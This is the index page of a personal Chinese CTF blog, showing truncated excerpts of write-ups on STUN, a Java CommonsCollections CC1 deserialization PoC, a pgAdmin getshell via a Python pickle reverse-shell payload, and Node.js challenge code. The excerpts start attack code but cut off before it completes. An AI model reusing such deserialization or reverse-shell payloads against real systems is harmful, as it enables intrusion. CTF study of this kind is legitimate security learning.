zx's Blog

DASCTF × GFCTF-web,misc
发表于|dasctf
misc-tele没写出来,贴考点吧,下次多注意一下特殊的协议。 STUN(Session Traversal Utilities for NAT)是一种网络协议,用于在NAT(Network Address Translation,网络地址转换)后面的设备之间建立通信会话。它主要用于解决在实时通信中遇到的NAT穿越问题,比如VoIP、视频会议等应用。 STUN协议的主要功能包括: 发现公共IP地址:STUN客户端可以向STUN服务器发送请求,以发现客户端的公共IP地址和端口号。这对于P2P通信非常重要,因为它允许客户端知道其在Internet上的可访问地址。 检测NAT类型:STUN协议还可以帮助客户端识别其所在网络中的NAT类型,比如全锥形NAT、对称NAT、端口受限对称NAT等。这对于选择合适的通信策略非常重要。 解决对称NAT的问题:对称NAT会为每个不同的目标地址和端口分配不同的公共地址和端口。STUN协议通过与STUN服务器的交互,使得在同一NAT后面的两个设备可以互相发现对方的公共地址和端口,从而实现P2P通信。 虽然STUN协议可以帮助解决NAT穿越的问题,但它并 ...
java反序列化cc1
发表于|java反序列化
CC1链适用版本:CC 3.1-3.2.1, jdk < u71 poc:12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;impor ...
attack_tacooooo
发表于|nkctf
思路这个题比较抽象,长话短说,getshell是很简单的,就是找不到flag(我是fw) 首先题目是pgadmin,在我写这个的时候题目已经有提示了,账号是tacooooo@qq.com,那密码自然就是tacooooo,弱密码登录 谷歌搜索pgadmin最新漏洞可以查到一篇文章,非常滴详细呀,而且登录进系统之后也可以看看pgadmin的版本,刚刚好可以用,照抄就可以拿到shell 解题这里拿到shell的方式也不止一种,我自己用的是nc,但是LaoGong里面拿shell的方式感觉很有意思(我见识少了),是用的socket(这里copy一下,膜拜) 12345678910111213import pickleimport osimport pickletoolsclass exp(): def __reduce__(self): return (exec, ("import socket,subprocess,os; ...
全世界最简单的CTF
发表于|nkctf
源代码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152const express = require('express');const bodyParser = require('body-parser');const app = express();const fs = require("fs");const path = require('path');const vm = require("vm");app .use(bodyParser.json()) //以json格式接收参数 .set('views', path.join(__dirname, 'views')) .use(express.static(path.join(__dirname, '/public') ...
hackjs
发表于|vctfweb
源代码1234567891011121314151617181920212223242526272829303132333435363738394041const express = require('express') //从package.json可以得知express的版本为4.17.2const fs = require('fs')var bodyParser = require('body-parser');const app = express()app.use(bodyParser.urlencoded({ extended: true})); //定义bodyParser可以解析的数据格式,extended为true表示可以以数组的方式解析url编码数据app.use(bodyParser.json());app.post('/plz', (req, res) => { venom = req.body.venom if (O ...
test
发表于
test the first test beyond hello-world
Hello World
发表于
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment
avatar
zx
文章
43
标签
36
分类
24
Follow Me
公告
This is my Blog
最新文章
how_to_build_rag_model_by_dify_and_neo4j
first-src
每日一题
数据结构
Reversing Secrets of Reverse Engineering
分类
标签
web 鹏城杯 莫名其妙 网鼎杯 newstarctf vctf 算法 gfctf crypto sm3 ctfshow 阅读 brop 全书整理 pwn java反序列化 青龙组 游戏 ccb 日常 强网拟态 节日 学习 空间清理 作业 leetcode nkctf dasctf 考研 ai re ciscn 机器学习 src 恋爱 misc
归档
网站资讯
文章数目 :
43
本站访客数 :
本站总访问量 :
最后更新时间 :